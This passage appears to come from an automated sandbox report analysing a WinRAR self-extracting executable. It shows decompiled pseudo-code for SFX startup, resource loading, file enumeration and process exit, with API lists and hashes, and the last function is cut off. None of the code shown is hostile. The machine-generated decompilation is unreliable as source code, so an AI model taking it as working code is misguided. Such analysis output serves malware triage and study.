                                                                            				E00193E41(_t106 + 0x9c, 0x32, L"%4d-%02d-%02d-%02d-%02d-%02d-%03d",  *(_t106 + 0x24) & 0x0000ffff);
                                                                            				_t107 = _t106 + 0x28;
                                                                            				SetEnvironmentVariableW(L"sfxstime", _t107 + 0x7c);
                                                                            				_t97 = GetModuleHandleW(_t74);
                                                                            				 *0x1d0064 = _t97;
                                                                            				 *0x1d0060 = _t97; // executed
                                                                            				_t41 = LoadIconW(_t97, 0x64); // executed
                                                                            				 *0x1db704 = _t41;
                                                                            				 *0x1e5d04 = E001AA4F8(_t89, _t125);
                                                                            				E0019CFAB(0x1d0078, _t89, 0x1ece18);
                                                                            				E001A83FC(0);
                                                                            				E001A83FC(0);
                                                                            				 *0x1d75e8 = _t107 + 0x5c;
                                                                            				 *0x1d75ec = _t107 + 0x30; // executed
                                                                            				DialogBoxParamW(_t97, L"STARTDLG", _t74, E001AA5D1, _t74); // executed
                                                                            				 *0x1d75ec = _t74;
                                                                            				 *0x1d75e8 = _t74;
                                                                            				E001A84AE(_t107 + 0x24);
                                                                            				E001A84AE(_t107 + 0x50);
                                                                            				_t51 =  *0x1ede28;
                                                                            				if(_t51 != 0) {
                                                                            					Sleep(_t51);
                                                                            				}
                                                                            				if( *0x1d85f8 != 0) {
                                                                            					E001A9CA1(0x1ece18);
                                                                            				}
                                                                            				E0019E797(0x1e5c00);
                                                                            				if( *0x1d75e4 > 0) {
                                                                            					L001B2B4E( *0x1d75e0);
                                                                            				}
                                                                            				DeleteObject( *0x1db704);
                                                                            				_t54 =  *0x1e5d04;
                                                                            				if(_t54 != 0) {
                                                                            					DeleteObject(_t54);
                                                                            				}
                                                                            				if( *0x1d00e0 == 0 &&  *0x1d75d7 != 0) {
                                                                            					E00196E03(0x1d00e0, 0xff);
                                                                            				}
                                                                            				_t55 =  *0x1ede2c;
                                                                            				 *0x1d75d7 = 1;
                                                                            				if( *0x1ede2c != 0) {
                                                                            					E001AC8F0(_t55);
                                                                            					CloseHandle( *0x1ede2c);
                                                                            				}
                                                                            				_t99 =  *0x1d00e0; // 0x0
                                                                            				if( *0x1ede21 != 0) {
                                                                            					_t58 =  *0x1cd5fc; // 0x3e8
                                                                            					if( *0x1ede22 == 0) {
                                                                            						__eflags = _t58;
                                                                            						if(_t58 < 0) {
                                                                            							_t99 = _t99 - _t58;
                                                                            							__eflags = _t99;
                                                                            						}
                                                                            					} else {
                                                                            						_t99 =  *0x1ede24;
                                                                            						if(_t58 > 0) {
                                                                            							_t99 = _t99 + _t58;
                                                                            						}
                                                                            					}
                                                                            				}
                                                                            				E001A9B08(_t107 + 0x1c); // executed
                                                                            				return _t99;
                                                                            			}

                                                                            0x001acdcb
                                                                            0x001acdd8
                                                                            0x001acdda
                                                                            0x001acde1
                                                                            0x001acde4
                                                                            0x001acde4
                                                                            0x001acded
                                                                            0x001ace02
                                                                            0x001ace02
                                                                            0x001ace07
                                                                            0x001ace0c
                                                                            0x001ace15
                                                                            0x001ace18
                                                                            0x001ace23
                                                                            0x001ace23
                                                                            0x001ace30
                                                                            0x001ace36
                                                                            0x001ace3f
                                                                            0x001ace44
                                                                            0x001ace54
                                                                            0x001ace56
                                                                            0x001ace58
                                                                            0x001ace58
                                                                            0x001ace58
                                                                            0x001ace46
                                                                            0x001ace46
                                                                            0x001ace4e
                                                                            0x001ace50
                                                                            0x001ace50
                                                                            0x001ace4e
                                                                            0x001ace44
                                                                            0x001ace5e
                                                                            0x001ace6e

                                                                            APIs
                                                                              • Part of subcall function 0019FD49: GetModuleHandleW.KERNEL32 ref: 0019FD61
                                                                              • Part of subcall function 0019FD49: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0019FD79
                                                                              • Part of subcall function 0019FD49: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0019FD9C
                                                                              • Part of subcall function 001A95F8: GetCurrentDirectoryW.KERNEL32(?,?), ref: 001A9600
                                                                              • Part of subcall function 001A9AA0: OleInitialize.OLE32(00000000), ref: 001A9AB9
                                                                              • Part of subcall function 001A9AA0: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 001A9AF0
                                                                              • Part of subcall function 001A9AA0: SHGetMalloc.SHELL32(001D75C0), ref: 001A9AFA
                                                                              • Part of subcall function 001A1017: GetCPInfo.KERNEL32(00000000,?), ref: 001A1028
                                                                              • Part of subcall function 001A1017: IsDBCSLeadByte.KERNEL32(00000000), ref: 001A103C
                                                                            • GetCommandLineW.KERNEL32 ref: 001ACC00
                                                                            • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 001ACC27
                                                                            • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 001ACC38
                                                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 001ACC72
                                                                              • Part of subcall function 001AC891: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 001AC8A7
                                                                              • Part of subcall function 001AC891: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 001AC8E3
                                                                            • CloseHandle.KERNEL32(00000000), ref: 001ACC7B
                                                                            • GetModuleFileNameW.KERNEL32(00000000,001ECE18,00000800), ref: 001ACC96
                                                                            • SetEnvironmentVariableW.KERNELBASE(sfxname,001ECE18), ref: 001ACCA8
                                                                            • GetLocalTime.KERNEL32(?), ref: 001ACCAF
                                                                            • _swprintf.LIBCMT ref: 001ACCEE
                                                                            • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 001ACD00
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 001ACD03
                                                                            • LoadIconW.USER32(00000000,00000064), ref: 001ACD1A
                                                                            • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001A5D1,00000000), ref: 001ACD6B
                                                                            • Sleep.KERNEL32(?), ref: 001ACD99
                                                                            • DeleteObject.GDI32 ref: 001ACDD8
                                                                            • DeleteObject.GDI32(?), ref: 001ACDE4
                                                                            • CloseHandle.KERNEL32 ref: 001ACE23
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                            • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                            • API String ID: 788466649-433059772
                                                                            • Opcode ID: e6e323cbbbdd1da5326edac1a041bc8f7a2e3a273ddbf906d6977570b54813d5
                                                                            • Instruction ID: f8ec265bbc140ee70839a2cc49a4e1e9e362981bd8f309d0aaa7f2e8d2d61b27
                                                                            • Opcode Fuzzy Hash: e6e323cbbbdd1da5326edac1a041bc8f7a2e3a273ddbf906d6977570b54813d5
                                                                            • Instruction Fuzzy Hash: B7610375505340AFD711ABB5EC89F6B7BACBB6AB00F04042AF506A6591EBB4CC84C7E1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 67%
                                                                            			E001A963A(WCHAR* _a4) {
                                                                            				WCHAR* _v4;
                                                                            				intOrPtr _v8;
                                                                            				intOrPtr* _v16;
                                                                            				char _v20;
                                                                            				void* __ecx;
                                                                            				struct HRSRC__* _t14;
                                                                            				WCHAR* _t16;
                                                                            				void* _t17;
                                                                            				void* _t18;
                                                                            				void* _t19;
                                                                            				intOrPtr* _t26;
                                                                            				char* _t30;
                                                                            				long _t32;
                                                                            				void* _t34;
                                                                            				intOrPtr* _t35;
                                                                            				void* _t40;
                                                                            				struct HRSRC__* _t42;
                                                                            				intOrPtr* _t44;
                                                                            
                                                                            				_t14 = FindResourceW( *0x1d0060, _a4, "PNG");
                                                                            				_t42 = _t14;
                                                                            				if(_t42 == 0) {
                                                                            					return _t14;
                                                                            				}
                                                                            				_t32 = SizeofResource( *0x1d0060, _t42);
                                                                            				if(_t32 == 0) {
                                                                            					L4:
                                                                            					_t16 = 0;
                                                                            					L16:
                                                                            					return _t16;
                                                                            				}
                                                                            				_t17 = LoadResource( *0x1d0060, _t42);
                                                                            				if(_t17 == 0) {
                                                                            					goto L4;
                                                                            				}
                                                                            				_t18 = LockResource(_t17);
                                                                            				_t43 = _t18;
                                                                            				if(_t18 != 0) {
                                                                            					_v4 = 0;
                                                                            					_t19 = GlobalAlloc(2, _t32); // executed
                                                                            					_t40 = _t19;
                                                                            					if(_t40 == 0) {
                                                                            						L15:
                                                                            						_t16 = _v4;
                                                                            						goto L16;
                                                                            					}
                                                                            					if(GlobalLock(_t40) == 0) {
                                                                            						L14:
                                                                            						GlobalFree(_t40);
                                                                            						goto L15;
                                                                            					}
                                                                            					E001AEA80(_t20, _t43, _t32);
                                                                            					_a4 = 0;
                                                                            					_push( &_a4);
                                                                            					_push(0);
                                                                            					_push(_t40);
                                                                            					if( *0x1cdff8() == 0) {
                                                                            						_t26 = E001A95CF(_t24, _t34, _v8, 0); // executed
                                                                            						_t35 = _v16;
                                                                            						_t44 = _t26;
                                                                            						 *((intOrPtr*)( *_t35 + 8))(_t35);
                                                                            						if(_t44 != 0) {
                                                                            							 *((intOrPtr*)(_t44 + 8)) = 0;
                                                                            							if( *((intOrPtr*)(_t44 + 8)) == 0) {
                                                                            								_push(0xffffff);
                                                                            								_t30 =  &_v20;
                                                                            								_push(_t30);
                                                                            								_push( *((intOrPtr*)(_t44 + 4)));
                                                                            								L001AD81A(); // executed
                                                                            								if(_t30 != 0) {
                                                                            									 *((intOrPtr*)(_t44 + 8)) = _t30;
                                                                            								}
                                                                            							}
                                                                            							 *((intOrPtr*)( *_t44))(1);
                                                                            						}
                                                                            					}
                                                                            					GlobalUnlock(_t40);
                                                                            					goto L14;
                                                                            				}
                                                                            				goto L4;
                                                                            			}

                                                                            APIs
                                                                            • FindResourceW.KERNEL32(00000066,PNG,?,?,001AA54A,00000066), ref: 001A964B
                                                                            • SizeofResource.KERNEL32(00000000,77125B70,?,?,001AA54A,00000066), ref: 001A9663
                                                                            • LoadResource.KERNEL32(00000000,?,?,001AA54A,00000066), ref: 001A9676
                                                                            • LockResource.KERNEL32(00000000,?,?,001AA54A,00000066), ref: 001A9681
                                                                            • GlobalAlloc.KERNELBASE(00000002,00000000,00000000,?,?,?,001AA54A,00000066), ref: 001A969F
                                                                            • GlobalLock.KERNEL32 ref: 001A96AC
                                                                            • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 001A9707
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 001A971C
                                                                            • GlobalFree.KERNEL32 ref: 001A9723
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
                                                                            • String ID: PNG
                                                                            • API String ID: 4097654274-364855578
                                                                            • Opcode ID: a93743d03bbd0f04ecbceaf1e2fd784fd2bc7ba294aff5e1c952c0f866e7451d
                                                                            • Instruction ID: a0d6aab581d23b95fe02149f30cf0d060fad80f907806177cd13bd99bf4353f4
                                                                            • Opcode Fuzzy Hash: a93743d03bbd0f04ecbceaf1e2fd784fd2bc7ba294aff5e1c952c0f866e7451d
                                                                            • Instruction Fuzzy Hash: 002193B5611316AFC3229F61DC88E2B7FE9EF56790B15452DF945C2560DB31CC80CAA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 80%
                                                                            			E0019A2DF(void* __edx, intOrPtr _a4, intOrPtr _a8, char _a32, short _a592, void* _a4692, WCHAR* _a4696, intOrPtr _a4700) {
                                                                            				struct _WIN32_FIND_DATAW _v0;
                                                                            				char _v4;
                                                                            				intOrPtr _v8;
                                                                            				intOrPtr _v12;
                                                                            				intOrPtr _v16;
                                                                            				char _v20;
                                                                            				char _v24;
                                                                            				signed int _t43;
                                                                            				signed int _t49;
                                                                            				signed int _t63;
                                                                            				void* _t65;
                                                                            				long _t68;
                                                                            				char _t69;
                                                                            				void* _t73;
                                                                            				void* _t82;
                                                                            				intOrPtr _t84;
                                                                            				void* _t87;
                                                                            				signed int _t89;
                                                                            				void* _t90;
                                                                            
                                                                            				_t82 = __edx;
                                                                            				E001AD940();
                                                                            				_push(_t89);
                                                                            				_t87 = _a4692;
                                                                            				_t84 = _a4700;
                                                                            				_t90 = _t89 | 0xffffffff;
                                                                            				_push( &_v0);
                                                                            				if(_t87 != _t90) {
                                                                            					_t43 = FindNextFileW(_t87, ??);
                                                                            					__eflags = _t43;
                                                                            					if(_t43 == 0) {
                                                                            						_t87 = _t90;
                                                                            						_t63 = GetLastError();
                                                                            						__eflags = _t63 - 0x12;
                                                                            						_t11 = _t63 != 0x12;
                                                                            						__eflags = _t11;
                                                                            						 *((char*)(_t84 + 0x1044)) = _t63 & 0xffffff00 | _t11;
                                                                            					}
                                                                            					__eflags = _t87 - _t90;
                                                                            					if(_t87 != _t90) {
                                                                            						goto L13;
                                                                            					}
                                                                            				} else {
                                                                            					_t65 = FindFirstFileW(_a4696, ??); // executed
                                                                            					_t87 = _t65;
                                                                            					if(_t87 != _t90) {
                                                                            						L13:
                                                                            						E0019FAB1(_t84, _a4696, 0x800);
                                                                            						_push(0x800);
                                                                            						E0019B9B9(__eflags, _t84,  &_a32);
                                                                            						_t49 = 0 + _a8;
                                                                            						__eflags = _t49;
                                                                            						 *(_t84 + 0x1000) = _t49;
                                                                            						asm("adc ecx, 0x0");
                                                                            						 *((intOrPtr*)(_t84 + 0x1008)) = _v24;
                                                                            						 *((intOrPtr*)(_t84 + 0x1028)) = _v20;
                                                                            						 *((intOrPtr*)(_t84 + 0x102c)) = _v16;
                                                                            						 *((intOrPtr*)(_t84 + 0x1030)) = _v12;
                                                                            						 *((intOrPtr*)(_t84 + 0x1034)) = _v8;
                                                                            						 *((intOrPtr*)(_t84 + 0x1038)) = _v4;
                                                                            						 *(_t84 + 0x103c) = _v0.dwFileAttributes;
                                                                            						 *((intOrPtr*)(_t84 + 0x1004)) = _a4;
                                                                            						E001A0A81(_t84 + 0x1010, _t82,  &_v4);
                                                                            						E001A0A81(_t84 + 0x1018, _t82,  &_v24);
                                                                            						E001A0A81(_t84 + 0x1020, _t82,  &_v20);
                                                                            					} else {
                                                                            						if(E0019B32C(_a4696,  &_a592, 0x800) == 0) {
                                                                            							L4:
                                                                            							_t68 = GetLastError();
                                                                            							if(_t68 == 2 || _t68 == 3 || _t68 == 0x12) {
                                                                            								_t69 = 0;
                                                                            								__eflags = 0;
                                                                            							} else {
                                                                            								_t69 = 1;
                                                                            							}
                                                                            							 *((char*)(_t84 + 0x1044)) = _t69;
                                                                            						} else {
                                                                            							_t73 = FindFirstFileW( &_a592,  &_v0); // executed
                                                                            							_t87 = _t73;
                                                                            							if(_t87 != _t90) {
                                                                            								goto L13;
                                                                            							} else {
                                                                            								goto L4;
                                                                            							}
                                                                            						}
                                                                            					}
                                                                            				}
                                                                            				 *(_t84 + 0x1040) =  *(_t84 + 0x1040) & 0x00000000;
                                                                            				return _t87;
                                                                            			}























                                                                            APIs
                                                                            • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0019A1DA,000000FF,?,?), ref: 0019A314
                                                                            • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0019A1DA,000000FF,?,?), ref: 0019A34A
                                                                            • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0019A1DA,000000FF,?,?), ref: 0019A352
                                                                            • FindNextFileW.KERNEL32(?,?,?,?,?,?,0019A1DA,000000FF,?,?), ref: 0019A37A
                                                                            • GetLastError.KERNEL32(?,?,?,?,0019A1DA,000000FF,?,?), ref: 0019A386
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: FileFind$ErrorFirstLast$Next
                                                                            • String ID:
                                                                            • API String ID: 869497890-0
                                                                            • Opcode ID: d2a478e92d6ed58cd7560ad54d61d7ab4237eb8f95f6ff212142150a886fa996
                                                                            • Instruction ID: e94a4bb90356ae534e8a707e1be1f39a8c69e1131b3a8cdf914add42b3de35f3
                                                                            • Opcode Fuzzy Hash: d2a478e92d6ed58cd7560ad54d61d7ab4237eb8f95f6ff212142150a886fa996
                                                                            • Instruction Fuzzy Hash: 81419376604341AFC725DF34C880ADAF7E8BF49340F440A2AF5D9D3240D774AA58CB92
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E001B6AF3(int _a4) {
                                                                            				void* _t14;
                                                                            				void* _t16;
                                                                            
                                                                            				if(E001B9D6E(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
                                                                            					TerminateProcess(GetCurrentProcess(), _a4);
                                                                            				}
                                                                            				E001B6B78(_t14, _t16, _a4);
                                                                            				ExitProcess(_a4);
                                                                            			}






                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(?,?,001B6AC9,?,001CA800,0000000C,001B6C20,?,00000002,00000000), ref: 001B6B14
                                                                            • TerminateProcess.KERNEL32(00000000,?,001B6AC9,?,001CA800,0000000C,001B6C20,?,00000002,00000000), ref: 001B6B1B
                                                                            • ExitProcess.KERNEL32 ref: 001B6B2D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Process$CurrentExitTerminate
                                                                            • String ID:
                                                                            • API String ID: 1703294689-0
                                                                            • Opcode ID: d563ab0d3cd07a2f1cc478f7f6a01e6c255b88c9af87f003bb751d40a268150f
                                                                            • Instruction ID: 128339a2ceff68aaa11b521ddd6a1918197162307f5419e61b7d2c501b8041e5
                                                                            • Opcode Fuzzy Hash: d563ab0d3cd07a2f1cc478f7f6a01e6c255b88c9af87f003bb751d40a268150f
                                                                            • Instruction Fuzzy Hash: 8BE0EC31100248AFCF116FA4DE09E983F79EF64741F044414FA058B531CB39DD92CB90
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 68%
                                                                            			E001983C0(intOrPtr __ecx) {
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				signed int _t370;
                                                                            				signed int _t374;
                                                                            				signed int _t375;
                                                                            				signed int _t380;
                                                                            				signed int _t385;
                                                                            				void* _t387;
                                                                            				signed int _t388;
                                                                            				signed int _t392;
                                                                            				signed int _t393;
                                                                            				signed int _t398;
                                                                            				signed int _t403;
                                                                            				signed int _t404;
                                                                            				signed int _t408;
                                                                            				signed int _t418;
                                                                            				signed int _t419;
                                                                            				signed int _t422;
                                                                            				signed int _t423;
                                                                            				signed int _t432;
                                                                            				char _t434;
                                                                            				char _t436;
                                                                            				signed int _t437;
                                                                            				signed int _t438;
                                                                            				signed int _t460;
                                                                            				signed int _t469;
                                                                            				intOrPtr _t472;
                                                                            				char _t479;
                                                                            				signed int _t480;
                                                                            				void* _t491;
                                                                            				void* _t499;
                                                                            				void* _t501;
                                                                            				signed int _t511;
                                                                            				signed int _t515;
                                                                            				signed int _t516;
                                                                            				signed int _t517;
                                                                            				signed int _t520;
                                                                            				signed int _t523;
                                                                            				signed int _t531;
                                                                            				signed int _t541;
                                                                            				signed int _t543;
                                                                            				signed int _t545;
                                                                            				signed int _t547;
                                                                            				signed char _t548;
                                                                            				signed int _t551;
                                                                            				void* _t556;
                                                                            				signed int _t564;
                                                                            				intOrPtr* _t574;
                                                                            				intOrPtr _t576;
                                                                            				signed int _t577;
                                                                            				signed int _t586;
                                                                            				intOrPtr _t589;
                                                                            				signed int _t592;
                                                                            				signed int _t601;
                                                                            				signed int _t608;
                                                                            				signed int _t610;
                                                                            				signed int _t611;
                                                                            				signed int _t613;
                                                                            				signed int _t631;
                                                                            				signed int _t632;
                                                                            				void* _t639;
                                                                            				void* _t640;
                                                                            				signed int _t656;
                                                                            				signed int _t667;
                                                                            				intOrPtr _t668;
                                                                            				void* _t670;
                                                                            				signed int _t671;
                                                                            				signed int _t672;
                                                                            				signed int _t673;
                                                                            				signed int _t674;
                                                                            				signed int _t675;
                                                                            				signed int _t681;
                                                                            				intOrPtr _t683;
                                                                            				signed int _t688;
                                                                            				intOrPtr _t690;
                                                                            				signed int _t692;
                                                                            				signed int _t696;
                                                                            				void* _t698;
                                                                            				signed int _t699;
                                                                            				signed int _t702;
                                                                            				signed int _t703;
                                                                            				void* _t706;
                                                                            				void* _t708;
                                                                            				void* _t710;
                                                                            
                                                                            				_t576 = __ecx;
                                                                            				E001AD870(E001C12F2, _t706);
                                                                            				E001AD940();
                                                                            				_t574 =  *((intOrPtr*)(_t706 + 8));
                                                                            				_t665 = 0;
                                                                            				_t683 = _t576;
                                                                            				 *((intOrPtr*)(_t706 - 0x20)) = _t683;
                                                                            				_t370 =  *( *(_t683 + 8) + 0x82f2) & 0x0000ffff;
                                                                            				 *(_t706 - 0x18) = _t370;
                                                                            				if( *(_t706 + 0xc) != 0) {
                                                                            					L6:
                                                                            					_t690 =  *((intOrPtr*)(_t574 + 0x21dc));
                                                                            					__eflags = _t690 - 2;
                                                                            					if(_t690 == 2) {
                                                                            						 *(_t683 + 0x10f5) = _t665;
                                                                            						__eflags =  *(_t574 + 0x32dc) - _t665;
                                                                            						if(__eflags > 0) {
                                                                            							L22:
                                                                            							__eflags =  *(_t574 + 0x32e4) - _t665;
                                                                            							if(__eflags > 0) {
                                                                            								L26:
                                                                            								_t577 =  *(_t683 + 8);
                                                                            								__eflags =  *((intOrPtr*)(_t577 + 0x615c)) - _t665;
                                                                            								if( *((intOrPtr*)(_t577 + 0x615c)) != _t665) {
                                                                            									L29:
                                                                            									 *(_t706 - 0x11) = _t665;
                                                                            									_t35 = _t706 - 0x51a8; // -18856
                                                                            									_t36 = _t706 - 0x11; // 0x7ef
                                                                            									_t374 = E00195C80(_t577, _t574 + 0x2280, _t36, 6, _t665, _t35, 0x800);
                                                                            									__eflags = _t374;
                                                                            									_t375 = _t374 & 0xffffff00 | _t374 != 0x00000000;
                                                                            									 *(_t706 - 0x10) = _t375;
                                                                            									__eflags = _t375;
                                                                            									if(_t375 != 0) {
                                                                            										__eflags =  *(_t706 - 0x11);
                                                                            										if( *(_t706 - 0x11) == 0) {
                                                                            											__eflags = 0;
                                                                            											 *((char*)(_t683 + 0xf1)) = 0;
                                                                            										}
                                                                            									}
                                                                            									E00191F1B(_t574);
                                                                            									_push(0x800);
                                                                            									_t43 = _t706 - 0x113c; // -2364
                                                                            									_push(_t574 + 0x22a8);
                                                                            									E0019AFA3();
                                                                            									__eflags =  *((char*)(_t574 + 0x3373));
                                                                            									 *(_t706 - 0x1c) = 1;
                                                                            									if( *((char*)(_t574 + 0x3373)) == 0) {
                                                                            										_t380 = E00192005(_t574);
                                                                            										__eflags = _t380;
                                                                            										if(_t380 == 0) {
                                                                            											_t548 =  *(_t683 + 8);
                                                                            											__eflags = 1 -  *((intOrPtr*)(_t548 + 0x72bc));
                                                                            											asm("sbb al, al");
                                                                            											_t61 = _t706 - 0x10;
                                                                            											 *_t61 =  *(_t706 - 0x10) &  !_t548;
                                                                            											__eflags =  *_t61;
                                                                            										}
                                                                            									} else {
                                                                            										_t551 =  *( *(_t683 + 8) + 0x72bc);
                                                                            										__eflags = _t551 - 1;
                                                                            										if(_t551 != 1) {
                                                                            											__eflags =  *(_t706 - 0x11);
                                                                            											if( *(_t706 - 0x11) == 0) {
                                                                            												__eflags = _t551;
                                                                            												 *(_t706 - 0x10) =  *(_t706 - 0x10) & (_t551 & 0xffffff00 | _t551 == 0x00000000) - 0x00000001;
                                                                            												_push(0);
                                                                            												_t54 = _t706 - 0x113c; // -2364
                                                                            												_t556 = E0019B8F2(_t54);
                                                                            												_t656 =  *(_t683 + 8);
                                                                            												__eflags =  *((intOrPtr*)(_t656 + 0x72bc)) - 1 - _t556;
                                                                            												if( *((intOrPtr*)(_t656 + 0x72bc)) - 1 != _t556) {
                                                                            													 *(_t706 - 0x10) = 0;
                                                                            												} else {
                                                                            													_t57 = _t706 - 0x113c; // -2364
                                                                            													_push(1);
                                                                            													E0019B8F2(_t57);
                                                                            												}
                                                                            											}
                                                                            										}
                                                                            									}
                                                                            									 *((char*)(_t683 + 0x5f)) =  *((intOrPtr*)(_t574 + 0x3319));
                                                                            									 *((char*)(_t683 + 0x60)) = 0;
                                                                            									asm("sbb eax, [ebx+0x32dc]");
                                                                            									 *((intOrPtr*)( *_t574 + 0x10))( *((intOrPtr*)(_t574 + 0x6ca8)) -  *(_t574 + 0x32d8),  *((intOrPtr*)(_t574 + 0x6cac)), 0);
                                                                            									_t667 = 0;
                                                                            									_t385 = 0;
                                                                            									 *(_t706 + 0xb) = 0;
                                                                            									 *(_t706 + 0xc) = 0;
                                                                            									__eflags =  *(_t706 - 0x10);
                                                                            									if( *(_t706 - 0x10) != 0) {
                                                                            										L43:
                                                                            										_t692 =  *(_t706 - 0x18);
                                                                            										_t586 =  *((intOrPtr*)( *(_t683 + 8) + 0x61f9));
                                                                            										_t387 = 0x49;
                                                                            										__eflags = _t586;
                                                                            										if(_t586 == 0) {
                                                                            											L45:
                                                                            											_t388 = _t667;
                                                                            											L46:
                                                                            											__eflags = _t586;
                                                                            											_t82 = _t706 - 0x113c; // -2364
                                                                            											_t392 = E001A0FD9(_t586, _t82, (_t388 & 0xffffff00 | _t586 == 0x00000000) & 0x000000ff, _t388,  *(_t706 + 0xc)); // executed
                                                                            											__eflags = _t392;
                                                                            											if(__eflags == 0) {
                                                                            												L219:
                                                                            												_t393 = 0;
                                                                            												L16:
                                                                            												L17:
                                                                            												 *[fs:0x0] =  *((intOrPtr*)(_t706 - 0xc));
                                                                            												return _t393;
                                                                            											}
                                                                            											 *((intOrPtr*)(_t706 - 0x38)) = _t683 + 0x10f6;
                                                                            											_t85 = _t706 - 0x113c; // -2364
                                                                            											E001980B1(_t683, __eflags, _t574, _t85, _t683 + 0x10f6, 0x800);
                                                                            											__eflags =  *(_t706 + 0xb);
                                                                            											if( *(_t706 + 0xb) != 0) {
                                                                            												L50:
                                                                            												 *(_t706 + 0xf) = 0;
                                                                            												L51:
                                                                            												_t398 =  *(_t683 + 8);
                                                                            												_t589 = 0x45;
                                                                            												__eflags =  *((char*)(_t398 + 0x6153));
                                                                            												_t668 = 0x58;
                                                                            												 *((intOrPtr*)(_t706 - 0x34)) = _t589;
                                                                            												 *((intOrPtr*)(_t706 - 0x30)) = _t668;
                                                                            												if( *((char*)(_t398 + 0x6153)) != 0) {
                                                                            													L53:
                                                                            													__eflags = _t692 - _t589;
                                                                            													if(_t692 == _t589) {
                                                                            														L55:
                                                                            														_t96 = _t706 - 0x31a8; // -10664
                                                                            														E00196EF9(_t96);
                                                                            														_push(0);
                                                                            														_t97 = _t706 - 0x31a8; // -10664
                                                                            														_t403 = E0019A1B1(_t96, _t668, __eflags, _t683 + 0x10f6, _t97);
                                                                            														__eflags = _t403;
                                                                            														if(_t403 == 0) {
                                                                            															_t404 =  *(_t683 + 8);
                                                                            															__eflags =  *((char*)(_t404 + 0x6153));
                                                                            															_t108 = _t706 + 0xf;
